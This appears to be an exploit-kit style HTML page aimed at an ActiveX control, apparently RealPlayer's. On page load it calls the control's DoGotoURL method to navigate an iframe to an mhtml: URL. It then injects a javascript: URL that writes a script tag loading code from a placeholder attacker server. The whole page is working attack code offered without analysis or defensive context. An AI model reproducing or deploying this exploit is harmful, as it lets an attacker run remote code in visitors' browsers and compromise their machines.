<!DOCTYPE html><html>
<head>
<meta http-equiv=X-UA-Compatible content=IE=EmulateIE7>
</head>
<body onload="bl()">
<object id="a" classid="clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA" width=300 height=300>


</object>

<iframe src=frame.htm name=x1></iframe>
<script>

IP = "%SERVER%";
lt=String.fromCharCode(60);
gt=String.fromCharCode(62);


function bl()
{
a.DoGotoURL("mhtml:" + location.href,"x1");
setTimeout("bl2()",1000);
}


function bl2()
{
a.DoGotoURL("javascript:document.write('" + lt + "script src=http://" + IP + "/rp_G2/sm_rpx.js" + gt + lt + "/script" + gt + "');","x1");
}

</script></body>
</html>